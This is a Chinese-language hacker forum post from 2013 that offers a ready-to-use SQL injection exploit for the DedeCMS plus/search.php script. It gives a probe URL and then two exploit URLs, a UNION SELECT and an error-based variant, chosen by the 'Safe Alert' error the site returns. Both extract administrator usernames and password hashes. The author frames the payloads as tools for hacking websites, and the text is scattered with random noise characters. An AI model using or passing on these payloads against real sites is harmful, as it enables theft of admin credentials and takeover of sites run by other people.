找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2044|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ
3 k( g2 T7 h. f/ p. \& C( E, k- A" W2 x" N; w, I* O/ y* T
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。" n3 z( b% I2 U# [9 }7 {* k! ^
6 d  c+ J7 t& a9 \* v8 Y+ \# M0 w" [
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。- g2 S; b& m' W& a
# Z( w7 W4 @; \, h2 @' ^
我一般是这样测试的:0 s- ]& K8 t3 i% q3 m2 A5 m0 f
& l6 \% U8 n6 I
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a5 d9 k6 A2 _) \

2 c5 ?0 S/ e5 P7 P& D! ~6 S' x转载不加作者名的没JJ
6 R- z7 |* E+ E0 Z+ T
5 a! i+ I1 q6 M2 z2 E5 M2 C4 E作者:鬼哥3 F" \/ t5 E9 q! V8 |) ~; a; t
( n: Q2 ~1 r, r, b
+ B( {. [" W6 n$ K/ F8 n9 v* r

: \; @6 o7 u7 A) i看结果如果提示# \! u6 J0 e; y: h# Z/ @% K
& @4 o% \* V0 o. ?& U* h
Safe Alert: Request Error step 2 !0 I0 v/ Y0 O8 {; ^7 Q

3 a8 s) E: G& y$ F- B5 J4 J4 b那么直接用下面的exp) N: _! |, I+ t1 U% b3 n9 ?. E

9 j8 A5 E; _' E$ kxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
% m; q+ i7 q- ~9 \
. Y4 o2 S& d; E0 z0 N' x
$ {2 ~0 F/ Z7 o; o5 G' U9 L看结果如果提示. i" c  n% s# x7 B1 V

, m, o! i8 u, F3 F$ B' ~8 PSafe Alert: Request Error step 1 !' U. o0 G9 _: C$ A

/ ~" P8 k& a2 Y! W那么直接用下面的exp
  F4 E% m2 H, Y/ Y
- `5 v8 H9 m. r$ K. M+ B8 L/ g0 Txx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
& [+ D2 _+ d8 D1 K2 o* b  K5 e2 D" f& P% r( C! E2 E* H# W% ^
& f3 t8 k* a" Y$ B% `
如果正常显示证明漏洞不存在了。
0 g4 x9 T- n- D, x* j# S4 [* j- r: o  d8 Q1 i* }' i' Y
转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表